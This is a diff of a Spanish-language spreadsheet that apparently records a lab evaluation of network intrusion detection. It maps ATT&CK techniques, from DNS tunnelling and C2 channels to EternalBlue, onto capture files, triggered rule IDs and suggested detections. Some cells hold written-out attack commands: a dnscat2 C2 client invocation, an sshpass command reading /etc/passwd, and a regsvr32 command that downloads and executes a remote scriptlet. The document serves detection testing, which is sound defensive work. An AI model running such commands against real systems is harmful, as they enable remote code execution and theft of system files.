--- a/hojas/Detecciones.xlsx
+++ b/hojas/Detecciones.xlsx
@@ -13,7 +13,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3537" uniqueCount="1006">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3557" uniqueCount="1005">
   <si>
     <t>Nombre REGLA</t>
   </si>
@@ -730,7 +730,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>2101129,2101071,</t>
@@ -746,7 +746,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,2101201,</t>
@@ -762,7 +762,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,2101145,2010229,2101016,2100993,2019526,2101877,</t>
@@ -778,7 +778,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,1434,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887, 2049402</t>
@@ -788,7 +788,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>2101129,2101071,</t>
@@ -804,7 +804,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,</t>
@@ -820,7 +820,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,2101201,</t>
@@ -836,7 +836,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,2101145,2010229,2101016,2100993,2019526,2101877,</t>
@@ -852,7 +852,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,1434,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887,</t>
@@ -868,7 +868,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>,41742,33608,42289,59258, 2049402</t>
@@ -1225,24 +1225,31 @@
     <t>T1133_external-remote-services.pcapng</t>
   </si>
   <si>
-    <t>24303, 27611</t>
-  </si>
-  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>24303</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">24303, 27611, 2101620, </t>
-    </r>
+      <t>, 27611</t>
+    </r>
+  </si>
+  <si>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>2100527</t>
+      <t>24303</t>
     </r>
     <r>
       <rPr>
@@ -1250,15 +1257,7 @@
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
-      <t xml:space="preserve">, 2002749, 2001117, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2101917</t>
+      <t>, 27611, 2101620, 2100527, 2002749, 2001117, 2101917</t>
     </r>
   </si>
   <si>
@@ -1715,7 +1714,7 @@
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
+        <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
       <t>2101620</t>
@@ -2240,7 +2239,22 @@
     <t>T1557_redireccion.pcapng</t>
   </si>
   <si>
-    <t>2100469, 2100384, 2002752, 2002749, 2100366, 2100408, 2100472</t>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">2100469, 2100384, 2002752, 2002749, 2100366, 2100408, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2100472</t>
+    </r>
   </si>
   <si>
     <t>2100384, 2002752, 2100366, 2100469, 2100472, 2002749, 2100408</t>
@@ -2609,7 +2623,22 @@
     <t>T1499_land.pcapng</t>
   </si>
   <si>
-    <t>2100527, 2002752, 2002749, 2001579, 2001579</t>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">2100527, 2002752, 2002749, 2001579, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2001579</t>
+    </r>
   </si>
   <si>
     <t>Regla genérica que detecte envío de mensajes TCP SYN procedentes de la misma dirección IP a la que van dirigidos los paquetes. Los puertos origen/destino pueden ser incluso idénticos</t>
@@ -2828,7 +2857,22 @@
     <t>T1498_amplif_dns.pcapng</t>
   </si>
   <si>
-    <t>2002749, 2100402, 2002752, 2100254</t>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">2002749, 2100402, 2002752, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2100254</t>
+    </r>
   </si>
   <si>
     <t>Regla genérica que detecte un envío masivo de respuestas DNS no solicitadas con un mismo nombre resuelto hacia la red protegida</t>
@@ -2930,12 +2974,833 @@
     <t>T1071_tunel.pcapng</t>
   </si>
   <si>
+    <t>Regla genérica que detecta uso de dnscat</t>
+  </si>
+  <si>
+    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
+  </si>
+  <si>
+    <t>Multi-Stage Channels</t>
+  </si>
+  <si>
+    <t>T1104</t>
+  </si>
+  <si>
+    <t>Sesión Remota + Ataque C2</t>
+  </si>
+  <si>
+    <t>RDP, Covenant</t>
+  </si>
+  <si>
+    <t>T1104_multi-stage-channels.pcapng</t>
+  </si>
+  <si>
+    <t>2027792, 2027793</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027792, 2027793</t>
+    </r>
     <r>
       <rPr>
         <rFont val="Arial, sans-serif"/>
         <color rgb="FF000000"/>
         <sz val="11.0"/>
       </rPr>
+      <t>, 2002752, 2002749</t>
+    </r>
+  </si>
+  <si>
+    <t>Detección por anomalías. Investigación de las sesiones establecidas en el equipo atacante (siempre que sea posible) para identificar un rastro de otra dirección.</t>
+  </si>
+  <si>
+    <t>Fallback Channels</t>
+  </si>
+  <si>
+    <t>T1008</t>
+  </si>
+  <si>
+    <t>Traspaso de canal primario C2 a canal alternativo</t>
+  </si>
+  <si>
+    <t>Covenant</t>
+  </si>
+  <si>
+    <t>T1008_fallback-channels.pcapng</t>
+  </si>
+  <si>
+    <t>2027792, 2027793, 2027326</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027792, 2027793, 2027326, 44489</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">2027792, 2027793, 2027326, 44489, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002752</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002749</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2101620</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2044666</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2051116</t>
+    </r>
+  </si>
+  <si>
+    <t>2002752, 2101620, 2002749</t>
+  </si>
+  <si>
+    <t>La detección de la creación del canal es posible para este caso concreto. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
+  </si>
+  <si>
+    <t>Web Service</t>
+  </si>
+  <si>
+    <t>T1102</t>
+  </si>
+  <si>
+    <t>One-Way Communication</t>
+  </si>
+  <si>
+    <t>T1102.003</t>
+  </si>
+  <si>
+    <t>Subida de información confidencial a Workspace de Google Drive</t>
+  </si>
+  <si>
+    <t>Covenant, Google Drive API</t>
+  </si>
+  <si>
+    <t>T1102.003_web-service-one-way-communication.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027792, 2027793</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 2002752, 2002749, 2100628</t>
+    </r>
+  </si>
+  <si>
+    <t>Detección por anomalías, observando actividad inusual relacionada con el uso de servicios web (subidas pesadas de información a la nube, comunicación periódica con servidores web concretos, etc)</t>
+  </si>
+  <si>
+    <t>Proxy</t>
+  </si>
+  <si>
+    <t>T1090</t>
+  </si>
+  <si>
+    <t>Internal Proxy</t>
+  </si>
+  <si>
+    <t>T1090.001</t>
+  </si>
+  <si>
+    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
+  </si>
+  <si>
+    <t>T1090_proxy-internal-proxy.pcapng</t>
+  </si>
+  <si>
+    <t>2027794, 2027793, 2027792</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027794, 2027793, 2027792</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 50447</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027794, 2027793</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027792</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">, 50447, 2002752, 2002749, 2101620 </t>
+    </r>
+  </si>
+  <si>
+    <t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
+  </si>
+  <si>
+    <t>Data Obfuscation</t>
+  </si>
+  <si>
+    <t>T1001</t>
+  </si>
+  <si>
+    <t>Protocol Impersonation</t>
+  </si>
+  <si>
+    <t>T1001.003</t>
+  </si>
+  <si>
+    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
+  </si>
+  <si>
+    <t>FakeTLS (raykaryshyn Github)</t>
+  </si>
+  <si>
+    <t>T1001_data-obfuscation-protocol-impersonation.pcapng</t>
+  </si>
+  <si>
+    <t>20022752, 2002749</t>
+  </si>
+  <si>
+    <t>Regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
+  </si>
+  <si>
+    <t>Steganography</t>
+  </si>
+  <si>
+    <t>T1001.002</t>
+  </si>
+  <si>
+    <t>Inserción de información confidencial en una imagen JPG</t>
+  </si>
+  <si>
+    <t>Covenant, SSH, scp, Powershell</t>
+  </si>
+  <si>
+    <t>T1001.002_data-obfuscation-steganography.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027792, 2027793</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 2002752, 2002749, 2100628</t>
+    </r>
+  </si>
+  <si>
+    <t xml:space="preserve">Detección por anomalías y/o estegoanálisis, envío de imágenes o ficheros con formato poco común entre equipos, existencia de ficheros comprimidos sospechosos, etc. </t>
+  </si>
+  <si>
+    <t>Ingress Tool Transfer</t>
+  </si>
+  <si>
+    <t>T1105</t>
+  </si>
+  <si>
+    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
+  </si>
+  <si>
+    <t>Metasploit, FTP</t>
+  </si>
+  <si>
+    <t>T1105.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002752,2002749,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2027768</t>
+    </r>
+  </si>
+  <si>
+    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
+  </si>
+  <si>
+    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
+  </si>
+  <si>
+    <t>Data Encoding</t>
+  </si>
+  <si>
+    <t>T1132</t>
+  </si>
+  <si>
+    <t>Standard Encoding</t>
+  </si>
+  <si>
+    <t>T1132.001</t>
+  </si>
+  <si>
+    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
+  </si>
+  <si>
+    <t>Metasploit, curl, base64</t>
+  </si>
+  <si>
+    <t>Deteccion por anomalias</t>
+  </si>
+  <si>
+    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
+  </si>
+  <si>
+    <t>Remote Access Software</t>
+  </si>
+  <si>
+    <t>T1219</t>
+  </si>
+  <si>
+    <t>Uso de TeamViewer para establecer canal de comunicación alternativo</t>
+  </si>
+  <si>
+    <t>TeamViewer</t>
+  </si>
+  <si>
+    <t>RemoteAccessSoftwareLocal.pcapng, RemoteAccessSoftwareNAT.pcapng</t>
+  </si>
+  <si>
+    <t>Deteccion por listas negras/anomalías. Monitorizar tráfico de red correspondiente a softwares de acesso remoto(AnyDesk, TeamViewer...)</t>
+  </si>
+  <si>
+    <t>Conexion mediante TeamViewer entre dos equipos</t>
+  </si>
+  <si>
+    <t>Dynamic Resolution</t>
+  </si>
+  <si>
+    <t>T1568</t>
+  </si>
+  <si>
+    <t>Fast Flux DNS</t>
+  </si>
+  <si>
+    <t>T1568.001</t>
+  </si>
+  <si>
+    <t>Esconder un C2 Server mediante un servidor DNS con bajo TTL y modo Fast Flux</t>
+  </si>
+  <si>
+    <t>bind, Metasploit</t>
+  </si>
+  <si>
+    <t>T1568_fastFluxDNS.pcapng</t>
+  </si>
+  <si>
+    <t>366,29456,384,408</t>
+  </si>
+  <si>
+    <t>366,29456,384,408,2100366</t>
+  </si>
+  <si>
+    <t>366,29456,384,408,2002752,2002749,2100366,2100384,2100408</t>
+  </si>
+  <si>
+    <t>2002752, 2100384, 2100366, 2100408, 2002749</t>
+  </si>
+  <si>
+    <t>Deteccion por anomalias o listas negras</t>
+  </si>
+  <si>
+    <t>Servidor DNS "Round Robin"</t>
+  </si>
+  <si>
+    <t>Hide Infrastructure</t>
+  </si>
+  <si>
+    <t>T1665</t>
+  </si>
+  <si>
+    <t>Esconder el servidor C2 utilizando un Proxy</t>
+  </si>
+  <si>
+    <t>Metasploit, HTTP Server</t>
+  </si>
+  <si>
+    <t>T1665.pcapng</t>
+  </si>
+  <si>
+    <t>2002752,2002749,2100628</t>
+  </si>
+  <si>
+    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
+  </si>
+  <si>
+    <t>Esconder el servidor C2 utilizando un proxy</t>
+  </si>
+  <si>
+    <t>Protocol Tunneling</t>
+  </si>
+  <si>
+    <t>T1572</t>
+  </si>
+  <si>
+    <t>Tunelizar la conexión al C2 Server mediante SSH</t>
+  </si>
+  <si>
+    <t>SSH, Metasploit</t>
+  </si>
+  <si>
+    <t>T1572.pcapng</t>
+  </si>
+  <si>
+    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
+  </si>
+  <si>
+    <t>Tunelizar una conexion mediante SSH</t>
+  </si>
+  <si>
+    <t>Encrypted Channel</t>
+  </si>
+  <si>
+    <t>T1573</t>
+  </si>
+  <si>
+    <t>Assymetric Cryptography</t>
+  </si>
+  <si>
+    <t>T1573.002</t>
+  </si>
+  <si>
+    <t>Encriptar conexion con C2 Server</t>
+  </si>
+  <si>
+    <t>Metasploit, OpenSSL</t>
+  </si>
+  <si>
+    <t>T1573.002.pcapng</t>
+  </si>
+  <si>
+    <t>Encriptar conexion al C2 Server</t>
+  </si>
+  <si>
+    <t>Non-Standard Port</t>
+  </si>
+  <si>
+    <t>T1571</t>
+  </si>
+  <si>
+    <t>Sesión SSH en puerto 2200</t>
+  </si>
+  <si>
+    <t>ssh</t>
+  </si>
+  <si>
+    <t>T1571.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>2002752,2002749,</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>13586</t>
+    </r>
+  </si>
+  <si>
+    <t>Establecer una sesion SSH sobre un puerto no estandar. Comando: sshpass -p salas ssh salas@192.168.2.2 -p 2200 cat /etc/passwd</t>
+  </si>
+  <si>
+    <t>Defense Evasion, Persistence</t>
+  </si>
+  <si>
+    <t>Indicator Removal</t>
+  </si>
+  <si>
+    <t>T1070</t>
+  </si>
+  <si>
+    <t>Network Share Connection Removal</t>
+  </si>
+  <si>
+    <t>T1070.005</t>
+  </si>
+  <si>
+    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
+  </si>
+  <si>
+    <t>T1070_indicator-removal-network-share-connection-removal.pcapng</t>
+  </si>
+  <si>
+    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
+  </si>
+  <si>
+    <t>Modify Registry</t>
+  </si>
+  <si>
+    <t>T1112</t>
+  </si>
+  <si>
+    <t>Modificación del Registro de forma remota</t>
+  </si>
+  <si>
+    <t>reg (Remoto)</t>
+  </si>
+  <si>
+    <t>T1112_modify-registry.pcapng</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">44489, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>38319</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t xml:space="preserve">44489, </t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FFFF0000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>38319</t>
+    </r>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
+      <t>, 2002752, 2002749, 2044666, 2051116</t>
+    </r>
+  </si>
+  <si>
+    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
+  </si>
+  <si>
+    <t>Rogue Domain Controller</t>
+  </si>
+  <si>
+    <t>T1207</t>
+  </si>
+  <si>
+    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
+  </si>
+  <si>
+    <t>T1207_rogue-domain-controller.pcapng</t>
+  </si>
+  <si>
+    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5)</t>
+  </si>
+  <si>
+    <t>System Binary Proxy Execution</t>
+  </si>
+  <si>
+    <t>T1218</t>
+  </si>
+  <si>
+    <t>Regsvr32</t>
+  </si>
+  <si>
+    <t>T1218.010</t>
+  </si>
+  <si>
+    <t>Ejecución de COM scriptlet remoto</t>
+  </si>
+  <si>
+    <t>Regsvr32.exe</t>
+  </si>
+  <si>
+    <t>T1218.010.pcapng</t>
+  </si>
+  <si>
+    <t>Aprovechar vulnerabilidad regsvr32.exe descargando y ejecutando scripts y librerias evadiendo controles de seguridad Windows. Comando: C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
+  </si>
+  <si>
+    <t>Template Injection</t>
+  </si>
+  <si>
+    <t>T1221</t>
+  </si>
+  <si>
+    <t>Inyectar un fichero mediante Phishing .docx con macros modificadas que permita pasar desapercibido</t>
+  </si>
+  <si>
+    <t>Sitios web convencionales (Gmail)</t>
+  </si>
+  <si>
+    <t>T1221.pcapng</t>
+  </si>
+  <si>
+    <t>402,50447,2002752,2002749,2013491,2013490,2009768,2100402</t>
+  </si>
+  <si>
+    <t>Detección por lista negra/anomalías. Debería monitorizarse y detectar tráfico de red hacia direcciones o dominios marcados en listas negras. En algún caso concreto, se puede descargar y ejecutar malware por lo que se debe monitorizar y detectar la descarga de este tipo de ficheros</t>
+  </si>
+  <si>
+    <t>Modificación de fichero .docx para, mediante macros, provocar la descarga y ejecución de malware en el equipo víctima</t>
+  </si>
+  <si>
+    <t>Network Boundary Bridging</t>
+  </si>
+  <si>
+    <t>T1599</t>
+  </si>
+  <si>
+    <t>NAT Traversal</t>
+  </si>
+  <si>
+    <t>T1599.001</t>
+  </si>
+  <si>
+    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
+  </si>
+  <si>
+    <t>iptables</t>
+  </si>
+  <si>
+    <t>NBB1.pcapng, NBB2.pcapng</t>
+  </si>
+  <si>
+    <t>Deteccion por anomalías</t>
+  </si>
+  <si>
+    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
+  </si>
+  <si>
+    <t>Salto de VLAN</t>
+  </si>
+  <si>
+    <t>T1599_salto_vlan.pcapng</t>
+  </si>
+  <si>
+    <t>2101620, 2002752, 2002749</t>
+  </si>
+  <si>
+    <t>Detección por anomalías y estudio de topología de red, que detecte posibles vulnerabilidades relacionadas con el etiquetado apilable 802.1Q</t>
+  </si>
+  <si>
+    <t>Build Image on Host</t>
+  </si>
+  <si>
+    <t>T1612</t>
+  </si>
+  <si>
+    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
+  </si>
+  <si>
+    <t>DockerAPI, SSH</t>
+  </si>
+  <si>
+    <t>BuildImageOnHostLocal.pcapng, BuildImageOnHostNAT.pcapng</t>
+  </si>
+  <si>
+    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
+  </si>
+  <si>
+    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
+  </si>
+  <si>
+    <t>Command and Control, Persistence</t>
+  </si>
+  <si>
+    <t>Lateral Movement</t>
+  </si>
+  <si>
+    <t>Exploitation of Remote Services</t>
+  </si>
+  <si>
+    <t>T1210</t>
+  </si>
+  <si>
+    <t>EternalBlue</t>
+  </si>
+  <si>
+    <t>T1210-eternal_blue.pcapng</t>
+  </si>
+  <si>
+    <t>2102465,2025992,2025649,2025650,42944</t>
+  </si>
+  <si>
+    <t>44487,44485,44489,5730,42944,2102465,2025992,2025649,2025650</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <rFont val="Arial, sans-serif"/>
+        <color rgb="FF000000"/>
+        <sz val="11.0"/>
+      </rPr>
       <t>2002752,2002749</t>
     </r>
     <r>
@@ -2944,85 +3809,152 @@
         <color rgb="FFFF0000"/>
         <sz val="11.0"/>
       </rPr>
-      <t>,2013514,54827</t>
-    </r>
-  </si>
-  <si>
-    <t>Regla genérica que detecta uso de dnscat</t>
-  </si>
-  <si>
-    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
-  </si>
-  <si>
-    <t>Multi-Stage Channels</t>
-  </si>
-  <si>
-    <t>T1104</t>
-  </si>
-  <si>
-    <t>Sesión Remota + Ataque C2</t>
-  </si>
-  <si>
-    <t>RDP, Covenant</t>
-  </si>
-  <si>
-    <t>T1104_multi-stage-channels.pcapng</t>
-  </si>
-  <si>
-    <t>2027792, 2027793</t>
-  </si>
-  <si>
-    <t>2027792, 2027793, 2002752, 2002749</t>
-  </si>
-  <si>
-    <t>Detección por anomalías. Investigación de las sesiones establecidas en el equipo atacante (siempre que sea posible) para identificar un rastro de otra dirección.</t>
-  </si>
-  <si>
-    <t>Fallback Channels</t>
-  </si>
-  <si>
-    <t>T1008</t>
-  </si>
-  <si>
-    <t>Traspaso de canal primario C2 a canal alternativo</t>
-  </si>
-  <si>
-    <t>Covenant</t>
-  </si>
-  <si>
-    <t>T1008_fallback-channels.pcapng</t>
-  </si>
-  <si>
-    <t>2027792, 2027793, 2027326</t>
-  </si>
-  <si>
+      <t>,2044666,2023997,2044665,2102465,2025992,2025649,2025650,2024766,42944,44487,44485,44489,5730</t>
+    </r>
+  </si>
+  <si>
+    <t>Regla genérica que detecte uso de EternalBlue</t>
+  </si>
+  <si>
